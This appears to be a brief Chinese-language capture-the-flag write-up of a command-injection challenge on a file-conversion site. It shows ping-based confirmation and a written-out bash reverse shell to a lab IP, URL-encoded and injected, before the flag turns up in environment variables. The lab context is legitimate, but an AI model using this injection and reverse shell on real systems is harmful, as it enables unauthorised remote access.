题目很明确,告诉了是个命令注入
直接开环境访问
网站是个转换工具
抓包来测试是否存在命令注入
首先得使用tcpdump来监听网卡
但因为我用的是工具箱的kali,会一直有通信,所以需要先进行一个过滤,这里为了方便我过滤的是来源网站IP的数据包
构造命令注入,尝试ping这台kali
成功收到请求
接着开始尝试反弹shell
bash -i >& /dev/tcp/10.10.78.194/3333 0>&1
这里进行了一个url编码,拼接
成功反弹回shell
找了半天没找到flag,看了下提示
直接env查看用户环境变量
难怪find了半天文件没找到--
Comments NOTHING